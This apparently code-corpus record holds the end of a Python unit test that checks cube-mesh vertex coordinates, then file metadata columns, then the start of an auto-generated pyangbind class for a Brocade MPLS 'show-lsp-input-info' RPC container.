[0.26666667, 0.60000000, 0.80000000],
[0.20000000, 0.60000000, 0.80000000]],
[[0.26666667, 0.60000000, 0.40000000],
[0.33333333, 0.60000000, 0.40000000],
[0.33333333, 0.60000000, 0.53333333],
[0.26666667, 0.60000000, 0.53333333]],
[[0.26666667, 0.60000000, 0.53333333],
[0.33333333, 0.60000000, 0.53333333],
[0.33333333, 0.60000000, 0.66666667],
[0.26666667, 0.60000000, 0.66666667]],
[[0.26666667, 0.60000000, 0.66666667],
[0.33333333, 0.60000000, 0.66666667],
[0.33333333, 0.60000000, 0.80000000],
[0.26666667, 0.60000000, 0.80000000]],
[[0.33333333, 0.60000000, 0.40000000],
[0.40000000, 0.60000000, 0.40000000],
[0.40000000, 0.60000000, 0.53333333],
[0.33333333, 0.60000000, 0.53333333]],
[[0.33333333, 0.60000000, 0.53333333],
[0.40000000, 0.60000000, 0.53333333],
[0.40000000, 0.60000000, 0.66666667],
[0.33333333, 0.60000000, 0.66666667]],
[[0.33333333, 0.60000000, 0.66666667],
[0.40000000, 0.60000000, 0.66666667],
[0.40000000, 0.60000000, 0.80000000],
[0.33333333, 0.60000000, 0.80000000]],
[[0.20000000, 1.20000000, 0.40000000],
[0.26666667, 1.20000000, 0.40000000],
[0.26666667, 1.20000000, 0.53333333],
[0.20000000, 1.20000000, 0.53333333]],
[[0.20000000, 1.20000000, 0.53333333],
[0.26666667, 1.20000000, 0.53333333],
[0.26666667, 1.20000000, 0.66666667],
[0.20000000, 1.20000000, 0.66666667]],
[[0.20000000, 1.20000000, 0.66666667],
[0.26666667, 1.20000000, 0.66666667],
[0.26666667, 1.20000000, 0.80000000],
[0.20000000, 1.20000000, 0.80000000]],
[[0.26666667, 1.20000000, 0.40000000],
[0.33333333, 1.20000000, 0.40000000],
[0.33333333, 1.20000000, 0.53333333],
[0.26666667, 1.20000000, 0.53333333]],
[[0.26666667, 1.20000000, 0.53333333],
[0.33333333, 1.20000000, 0.53333333],
[0.33333333, 1.20000000, 0.66666667],
[0.26666667, 1.20000000, 0.66666667]],
[[0.26666667, 1.20000000, 0.66666667],
[0.33333333, 1.20000000, 0.66666667],
[0.33333333, 1.20000000, 0.80000000],
[0.26666667, 1.20000000, 0.80000000]],
[[0.33333333, 1.20000000, 0.40000000],
[0.40000000, 1.20000000, 0.40000000],
[0.40000000, 1.20000000, 0.53333333],
[0.33333333, 1.20000000, 0.53333333]],
[[0.33333333, 1.20000000, 0.53333333],
[0.40000000, 1.20000000, 0.53333333],
[0.40000000, 1.20000000, 0.66666667],
[0.33333333, 1.20000000, 0.66666667]],
[[0.33333333, 1.20000000, 0.66666667],
[0.40000000, 1.20000000, 0.66666667],
[0.40000000, 1.20000000, 0.80000000],
[0.33333333, 1.20000000, 0.80000000]],
[[0.20000000, 0.60000000, 0.40000000],
[0.20000000, 0.80000000, 0.40000000],
[0.20000000, 0.80000000, 0.53333333],
[0.20000000, 0.60000000, 0.53333333]],
[[0.20000000, 0.60000000, 0.53333333],
[0.20000000, 0.80000000, 0.53333333],
[0.20000000, 0.80000000, 0.66666667],
[0.20000000, 0.60000000, 0.66666667]],
[[0.20000000, 0.60000000, 0.66666667],
[0.20000000, 0.80000000, 0.66666667],
[0.20000000, 0.80000000, 0.80000000],
[0.20000000, 0.60000000, 0.80000000]],
[[0.20000000, 0.80000000, 0.40000000],
[0.20000000, 1.00000000, 0.40000000],
[0.20000000, 1.00000000, 0.53333333],
[0.20000000, 0.80000000, 0.53333333]],
[[0.20000000, 0.80000000, 0.53333333],
[0.20000000, 1.00000000, 0.53333333],
[0.20000000, 1.00000000, 0.66666667],
[0.20000000, 0.80000000, 0.66666667]],
[[0.20000000, 0.80000000, 0.66666667],
[0.20000000, 1.00000000, 0.66666667],
[0.20000000, 1.00000000, 0.80000000],
[0.20000000, 0.80000000, 0.80000000]],
[[0.20000000, 1.00000000, 0.40000000],
[0.20000000, 1.20000000, 0.40000000],
[0.20000000, 1.20000000, 0.53333333],
[0.20000000, 1.00000000, 0.53333333]],
[[0.20000000, 1.00000000, 0.53333333],
[0.20000000, 1.20000000, 0.53333333],
[0.20000000, 1.20000000, 0.66666667],
[0.20000000, 1.00000000, 0.66666667]],
[[0.20000000, 1.00000000, 0.66666667],
[0.20000000, 1.20000000, 0.66666667],
[0.20000000, 1.20000000, 0.80000000],
[0.20000000, 1.00000000, 0.80000000]],
[[0.40000000, 0.60000000, 0.40000000],
[0.40000000, 0.80000000, 0.40000000],
[0.40000000, 0.80000000, 0.53333333],
[0.40000000, 0.60000000, 0.53333333]],
[[0.40000000, 0.60000000, 0.53333333],
[0.40000000, 0.80000000, 0.53333333],
[0.40000000, 0.80000000, 0.66666667],
[0.40000000, 0.60000000, 0.66666667]],
[[0.40000000, 0.60000000, 0.66666667],
[0.40000000, 0.80000000, 0.66666667],
[0.40000000, 0.80000000, 0.80000000],
[0.40000000, 0.60000000, 0.80000000]],
[[0.40000000, 0.80000000, 0.40000000],
[0.40000000, 1.00000000, 0.40000000],
[0.40000000, 1.00000000, 0.53333333],
[0.40000000, 0.80000000, 0.53333333]],
[[0.40000000, 0.80000000, 0.53333333],
[0.40000000, 1.00000000, 0.53333333],
[0.40000000, 1.00000000, 0.66666667],
[0.40000000, 0.80000000, 0.66666667]],
[[0.40000000, 0.80000000, 0.66666667],
[0.40000000, 1.00000000, 0.66666667],
[0.40000000, 1.00000000, 0.80000000],
[0.40000000, 0.80000000, 0.80000000]],
[[0.40000000, 1.00000000, 0.40000000],
[0.40000000, 1.20000000, 0.40000000],
[0.40000000, 1.20000000, 0.53333333],
[0.40000000, 1.00000000, 0.53333333]],
[[0.40000000, 1.00000000, 0.53333333],
[0.40000000, 1.20000000, 0.53333333],
[0.40000000, 1.20000000, 0.66666667],
[0.40000000, 1.00000000, 0.66666667]],
[[0.40000000, 1.00000000, 0.66666667],
[0.40000000, 1.20000000, 0.66666667],
[0.40000000, 1.20000000, 0.80000000],
[0.40000000, 1.00000000, 0.80000000]]]
),
decimal=7) # yapf: disable
np.testing.assert_almost_equal(
cube(origin=np.array([-0.2, -0.4, -0.6]),
width=-0.2,
height=-0.4,
depth=-0.6,
width_segments=3,
height_segments=3,
depth_segments=3),
np.array(
[[[-0.20000000, -0.60000000, -0.40000000],
[-0.26666667, -0.60000000, -0.40000000],
[-0.26666667, -0.80000000, -0.40000000],
[-0.20000000, -0.80000000, -0.40000000]],
[[-0.20000000, -0.80000000, -0.40000000],
[-0.26666667, -0.80000000, -0.40000000],
[-0.26666667, -1.00000000, -0.40000000],
[-0.20000000, -1.00000000, -0.40000000]],
[[-0.20000000, -1.00000000, -0.40000000],
[-0.26666667, -1.00000000, -0.40000000],
[-0.26666667, -1.20000000, -0.40000000],
[-0.20000000, -1.20000000, -0.40000000]],
[[-0.26666667, -0.60000000, -0.40000000],
[-0.33333333, -0.60000000, -0.40000000],
[-0.33333333, -0.80000000, -0.40000000],
[-0.26666667, -0.80000000, -0.40000000]],
[[-0.26666667, -0.80000000, -0.40000000],
[-0.33333333, -0.80000000, -0.40000000],
[-0.33333333, -1.00000000, -0.40000000],
[-0.26666667, -1.00000000, -0.40000000]],
[[-0.26666667, -1.00000000, -0.40000000],
[-0.33333333, -1.00000000, -0.40000000],
[-0.33333333, -1.20000000, -0.40000000],
[-0.26666667, -1.20000000, -0.40000000]],
[[-0.33333333, -0.60000000, -0.40000000],
[-0.40000000, -0.60000000, -0.40000000],
[-0.40000000, -0.80000000, -0.40000000],
[-0.33333333, -0.80000000, -0.40000000]],
[[-0.33333333, -0.80000000, -0.40000000],
[-0.40000000, -0.80000000, -0.40000000],
[-0.40000000, -1.00000000, -0.40000000],
[-0.33333333, -1.00000000, -0.40000000]],
[[-0.33333333, -1.00000000, -0.40000000],
[-0.40000000, -1.00000000, -0.40000000],
[-0.40000000, -1.20000000, -0.40000000],
[-0.33333333, -1.20000000, -0.40000000]],
[[-0.20000000, -0.60000000, -0.80000000],
[-0.26666667, -0.60000000, -0.80000000],
[-0.26666667, -0.80000000, -0.80000000],
[-0.20000000, -0.80000000, -0.80000000]],
[[-0.20000000, -0.80000000, -0.80000000],
[-0.26666667, -0.80000000, -0.80000000],
[-0.26666667, -1.00000000, -0.80000000],
[-0.20000000, -1.00000000, -0.80000000]],
[[-0.20000000, -1.00000000, -0.80000000],
[-0.26666667, -1.00000000, -0.80000000],
[-0.26666667, -1.20000000, -0.80000000],
[-0.20000000, -1.20000000, -0.80000000]],
[[-0.26666667, -0.60000000, -0.80000000],
[-0.33333333, -0.60000000, -0.80000000],
[-0.33333333, -0.80000000, -0.80000000],
[-0.26666667, -0.80000000, -0.80000000]],
[[-0.26666667, -0.80000000, -0.80000000],
[-0.33333333, -0.80000000, -0.80000000],
[-0.33333333, -1.00000000, -0.80000000],
[-0.26666667, -1.00000000, -0.80000000]],
[[-0.26666667, -1.00000000, -0.80000000],
[-0.33333333, -1.00000000, -0.80000000],
[-0.33333333, -1.20000000, -0.80000000],
[-0.26666667, -1.20000000, -0.80000000]],
[[-0.33333333, -0.60000000, -0.80000000],
[-0.40000000, -0.60000000, -0.80000000],
[-0.40000000, -0.80000000, -0.80000000],
[-0.33333333, -0.80000000, -0.80000000]],
[[-0.33333333, -0.80000000, -0.80000000],
[-0.40000000, -0.80000000, -0.80000000],
[-0.40000000, -1.00000000, -0.80000000],
[-0.33333333, -1.00000000, -0.80000000]],
[[-0.33333333, -1.00000000, -0.80000000],
[-0.40000000, -1.00000000, -0.80000000],
[-0.40000000, -1.20000000, -0.80000000],
[-0.33333333, -1.20000000, -0.80000000]],
[[-0.20000000, -0.60000000, -0.40000000],
[-0.26666667, -0.60000000, -0.40000000],
[-0.26666667, -0.60000000, -0.53333333],
[-0.20000000, -0.60000000, -0.53333333]],
[[-0.20000000, -0.60000000, -0.53333333],
[-0.26666667, -0.60000000, -0.53333333],
[-0.26666667, -0.60000000, -0.66666667],
[-0.20000000, -0.60000000, -0.66666667]],
[[-0.20000000, -0.60000000, -0.66666667],
[-0.26666667, -0.60000000, -0.66666667],
[-0.26666667, -0.60000000, -0.80000000],
[-0.20000000, -0.60000000, -0.80000000]],
[[-0.26666667, -0.60000000, -0.40000000],
[-0.33333333, -0.60000000, -0.40000000],
[-0.33333333, -0.60000000, -0.53333333],
[-0.26666667, -0.60000000, -0.53333333]],
[[-0.26666667, -0.60000000, -0.53333333],
[-0.33333333, -0.60000000, -0.53333333],
[-0.33333333, -0.60000000, -0.66666667],
[-0.26666667, -0.60000000, -0.66666667]],
[[-0.26666667, -0.60000000, -0.66666667],
[-0.33333333, -0.60000000, -0.66666667],
[-0.33333333, -0.60000000, -0.80000000],
[-0.26666667, -0.60000000, -0.80000000]],
[[-0.33333333, -0.60000000, -0.40000000],
[-0.40000000, -0.60000000, -0.40000000],
[-0.40000000, -0.60000000, -0.53333333],
[-0.33333333, -0.60000000, -0.53333333]],
[[-0.33333333, -0.60000000, -0.53333333],
[-0.40000000, -0.60000000, -0.53333333],
[-0.40000000, -0.60000000, -0.66666667],
[-0.33333333, -0.60000000, -0.66666667]],
[[-0.33333333, -0.60000000, -0.66666667],
[-0.40000000, -0.60000000, -0.66666667],
[-0.40000000, -0.60000000, -0.80000000],
[-0.33333333, -0.60000000, -0.80000000]],
[[-0.20000000, -1.20000000, -0.40000000],
[-0.26666667, -1.20000000, -0.40000000],
[-0.26666667, -1.20000000, -0.53333333],
[-0.20000000, -1.20000000, -0.53333333]],
[[-0.20000000, -1.20000000, -0.53333333],
[-0.26666667, -1.20000000, -0.53333333],
[-0.26666667, -1.20000000, -0.66666667],
[-0.20000000, -1.20000000, -0.66666667]],
[[-0.20000000, -1.20000000, -0.66666667],
[-0.26666667, -1.20000000, -0.66666667],
[-0.26666667, -1.20000000, -0.80000000],
[-0.20000000, -1.20000000, -0.80000000]],
[[-0.26666667, -1.20000000, -0.40000000],
[-0.33333333, -1.20000000, -0.40000000],
[-0.33333333, -1.20000000, -0.53333333],
[-0.26666667, -1.20000000, -0.53333333]],
[[-0.26666667, -1.20000000, -0.53333333],
[-0.33333333, -1.20000000, -0.53333333],
[-0.33333333, -1.20000000, -0.66666667],
[-0.26666667, -1.20000000, -0.66666667]],
[[-0.26666667, -1.20000000, -0.66666667],
[-0.33333333, -1.20000000, -0.66666667],
[-0.33333333, -1.20000000, -0.80000000],
[-0.26666667, -1.20000000, -0.80000000]],
[[-0.33333333, -1.20000000, -0.40000000],
[-0.40000000, -1.20000000, -0.40000000],
[-0.40000000, -1.20000000, -0.53333333],
[-0.33333333, -1.20000000, -0.53333333]],
[[-0.33333333, -1.20000000, -0.53333333],
[-0.40000000, -1.20000000, -0.53333333],
[-0.40000000, -1.20000000, -0.66666667],
[-0.33333333, -1.20000000, -0.66666667]],
[[-0.33333333, -1.20000000, -0.66666667],
[-0.40000000, -1.20000000, -0.66666667],
[-0.40000000, -1.20000000, -0.80000000],
[-0.33333333, -1.20000000, -0.80000000]],
[[-0.20000000, -0.60000000, -0.40000000],
[-0.20000000, -0.80000000, -0.40000000],
[-0.20000000, -0.80000000, -0.53333333],
[-0.20000000, -0.60000000, -0.53333333]],
[[-0.20000000, -0.60000000, -0.53333333],
[-0.20000000, -0.80000000, -0.53333333],
[-0.20000000, -0.80000000, -0.66666667],
[-0.20000000, -0.60000000, -0.66666667]],
[[-0.20000000, -0.60000000, -0.66666667],
[-0.20000000, -0.80000000, -0.66666667],
[-0.20000000, -0.80000000, -0.80000000],
[-0.20000000, -0.60000000, -0.80000000]],
[[-0.20000000, -0.80000000, -0.40000000],
[-0.20000000, -1.00000000, -0.40000000],
[-0.20000000, -1.00000000, -0.53333333],
[-0.20000000, -0.80000000, -0.53333333]],
[[-0.20000000, -0.80000000, -0.53333333],
[-0.20000000, -1.00000000, -0.53333333],
[-0.20000000, -1.00000000, -0.66666667],
[-0.20000000, -0.80000000, -0.66666667]],
[[-0.20000000, -0.80000000, -0.66666667],
[-0.20000000, -1.00000000, -0.66666667],
[-0.20000000, -1.00000000, -0.80000000],
[-0.20000000, -0.80000000, -0.80000000]],
[[-0.20000000, -1.00000000, -0.40000000],
[-0.20000000, -1.20000000, -0.40000000],
[-0.20000000, -1.20000000, -0.53333333],
[-0.20000000, -1.00000000, -0.53333333]],
[[-0.20000000, -1.00000000, -0.53333333],
[-0.20000000, -1.20000000, -0.53333333],
[-0.20000000, -1.20000000, -0.66666667],
[-0.20000000, -1.00000000, -0.66666667]],
[[-0.20000000, -1.00000000, -0.66666667],
[-0.20000000, -1.20000000, -0.66666667],
[-0.20000000, -1.20000000, -0.80000000],
[-0.20000000, -1.00000000, -0.80000000]],
[[-0.40000000, -0.60000000, -0.40000000],
[-0.40000000, -0.80000000, -0.40000000],
[-0.40000000, -0.80000000, -0.53333333],
[-0.40000000, -0.60000000, -0.53333333]],
[[-0.40000000, -0.60000000, -0.53333333],
[-0.40000000, -0.80000000, -0.53333333],
[-0.40000000, -0.80000000, -0.66666667],
[-0.40000000, -0.60000000, -0.66666667]],
[[-0.40000000, -0.60000000, -0.66666667],
[-0.40000000, -0.80000000, -0.66666667],
[-0.40000000, -0.80000000, -0.80000000],
[-0.40000000, -0.60000000, -0.80000000]],
[[-0.40000000, -0.80000000, -0.40000000],
[-0.40000000, -1.00000000, -0.40000000],
[-0.40000000, -1.00000000, -0.53333333],
[-0.40000000, -0.80000000, -0.53333333]],
[[-0.40000000, -0.80000000, -0.53333333],
[-0.40000000, -1.00000000, -0.53333333],
[-0.40000000, -1.00000000, -0.66666667],
[-0.40000000, -0.80000000, -0.66666667]],
[[-0.40000000, -0.80000000, -0.66666667],
[-0.40000000, -1.00000000, -0.66666667],
[-0.40000000, -1.00000000, -0.80000000],
[-0.40000000, -0.80000000, -0.80000000]],
[[-0.40000000, -1.00000000, -0.40000000],
[-0.40000000, -1.20000000, -0.40000000],
[-0.40000000, -1.20000000, -0.53333333],
[-0.40000000, -1.00000000, -0.53333333]],
[[-0.40000000, -1.00000000, -0.53333333],
[-0.40000000, -1.20000000, -0.53333333],
[-0.40000000, -1.20000000, -0.66666667],
[-0.40000000, -1.00000000, -0.66666667]],
[[-0.40000000, -1.00000000, -0.66666667],
[-0.40000000, -1.20000000, -0.66666667],
[-0.40000000, -1.20000000, -0.80000000],
[-0.40000000, -1.00000000, -0.80000000]]]
),
decimal=7) # yapf: disable
if __name__ == '__main__':
unittest.main()
| 49.476728
| 78
| 0.461416
| 3,784
| 35,079
| 4.253171
| 0.026163
| 0.147633
| 0.140425
| 0.069343
| 0.968063
| 0.968063
| 0.94644
| 0.937306
| 0.936809
| 0.936809
| 0
| 0.625364
| 0.362952
| 35,079
| 708
| 79
| 49.54661
| 0.094823
| 0.015394
| 0
| 0.581144
| 0
| 0
| 0.007384
| 0.001046
| 0
| 0
| 0
| 0
| 0.030912
| 1
| 0.004637
| false
| 0
| 0.006182
| 0
| 0.015456
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
7753f358815d1b2e9807fa02e6c169bc48260a63
| 123,976
|
py
|
Python
|
pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | null | null | null |
pybind/slxos/v16r_1_00b/brocade_mpls_rpc/show_mpls_lsp_name_debug/input/show_lsp_input_info/__init__.py
|
shivharis/pybind
|
4e1c6d54b9fd722ccec25546ba2413d79ce337e6
|
[
"Apache-2.0"
] | 1
|
2021-11-05T22:15:42.000Z
|
2021-11-05T22:15:42.000Z
|
from operator import attrgetter
import pyangbind.lib.xpathhelper as xpathhelper
from pyangbind.lib.yangtypes import RestrictedPrecisionDecimalType, RestrictedClassType, TypedListType
from pyangbind.lib.yangtypes import YANGBool, YANGListType, YANGDynClass, ReferenceType
from pyangbind.lib.base import PybindBase
from decimal import Decimal
from bitarray import bitarray
import __builtin__
class show_lsp_input_info(PybindBase):
"""
This class was auto-generated by the PythonClass plugin for PYANG
from YANG module brocade-mpls - based on the path /brocade_mpls_rpc/show-mpls-lsp-name-debug/input/show-lsp-input-info. Each member element of
the container is represented as a class variable - with a specific
YANG type.
"""
__slots__ = ('_pybind_generated_by', '_path_helper', '_yang_name', '_rest_name', '_extmethods', '__lsp','__lsp_wide','__lsp_detail','__lsp_extensive','__lsp_debug','__lsp_name','__lsp_name_extensive','__lsp_name_debug','__bypass_lsp','__bypass_lsp_wide','__bypass_lsp_detail','__bypass_lsp_extensive','__bypass_lsp_debug','__bypass_lsp_name','__bypass_lsp_name_extensive','__bypass_lsp_name_debug','__bypass_lsp_static','__bypass_lsp_static_wide','__bypass_lsp_static_detail','__bypass_lsp_static_extensive','__bypass_lsp_static_debug','__bypass_lsp_static_name','__bypass_lsp_static_name_extensive','__bypass_lsp_static_name_debug','__bypass_lsp_dynamic','__bypass_lsp_dynamic_wide','__bypass_lsp_dynamic_detail','__bypass_lsp_dynamic_extensive','__bypass_lsp_dynamic_debug','__bypass_lsp_dynamic_name','__bypass_lsp_dynamic_name_extensive','__bypass_lsp_dynamic_name_debug','__lsp_input_lsp_name','__lsp_input_bypass','__lsp_input_dynamic','__lsp_input_brief','__lsp_input_wide','__lsp_input_detail','__lsp_input_extensive','__lsp_input_debug','__lsp_input_one','__lsp_input_all','__lsp_input_more',)
_yang_name = 'show-lsp-input-info'
_rest_name = ''
_pybind_generated_by = 'container'
def __init__(self, *args, **kwargs):
path_helper_ = kwargs.pop("path_helper", None)
if path_helper_ is False:
self._path_helper = False
elif path_helper_ is not None and isinstance(path_helper_, xpathhelper.YANGPathHelper):
self._path_helper = path_helper_
elif hasattr(self, "_parent"):
path_helper_ = getattr(self._parent, "_path_helper", False)
self._path_helper = path_helper_
else:
self._path_helper = False
extmethods = kwargs.pop("extmethods", None)
if extmethods is False:
self._extmethods = False
elif extmethods is not None and isinstance(extmethods, dict):
self._extmethods = extmethods
elif hasattr(self, "_parent"):
extmethods = getattr(self._parent, "_extmethods", None)
self._extmethods = extmethods
else:
self._extmethods = False
self.__lsp_input_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-detail", rest_name="lsp-input-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-wide", rest_name="lsp-input-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-name-extensive", rest_name="bypass-lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-name", rest_name="lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_input_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-debug", rest_name="lsp-input-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-wide", rest_name="lsp-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-debug", rest_name="bypass-lsp-dynamic-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-debug", rest_name="bypass-lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_more = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-input-more", rest_name="lsp-input-more", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-name-extensive", rest_name="bypass-lsp-static-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-debug", rest_name="lsp-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp", rest_name="lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_static_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-wide", rest_name="bypass-lsp-static-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-extensive", rest_name="bypass-lsp-static-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-name", rest_name="bypass-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-extensive", rest_name="bypass-lsp-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static-name", rest_name="bypass-lsp-static-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_dynamic_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-dynamic-name", rest_name="bypass-lsp-dynamic-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp", rest_name="bypass-lsp", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_dynamic_wide = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-wide", rest_name="bypass-lsp-dynamic-wide", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-extensive", rest_name="bypass-lsp-dynamic-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_name_debug = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-debug", rest_name="lsp-name-debug", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_input_lsp_name = YANGDynClass(base=unicode, is_leaf=True, yang_name="lsp-input-lsp-name", rest_name="lsp-input-lsp-name", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__bypass_lsp_static_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-static-detail", rest_name="bypass-lsp-static-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_static = YANGDynClass(base=unicode, is_leaf=True, yang_name="bypass-lsp-static", rest_name="bypass-lsp-static", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='string', is_config=True)
self.__lsp_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-detail", rest_name="lsp-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__lsp_name_extensive = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="lsp-name-extensive", rest_name="lsp-name-extensive", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
self.__bypass_lsp_dynamic_detail = YANGDynClass(base=YANGBool, is_leaf=True, yang_name="bypass-lsp-dynamic-detail", rest_name="bypass-lsp-dynamic-detail", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=False, namespace='urn:brocade.com:mgmt:brocade-mpls', defining_module='brocade-mpls', yang_type='boolean', is_config=True)
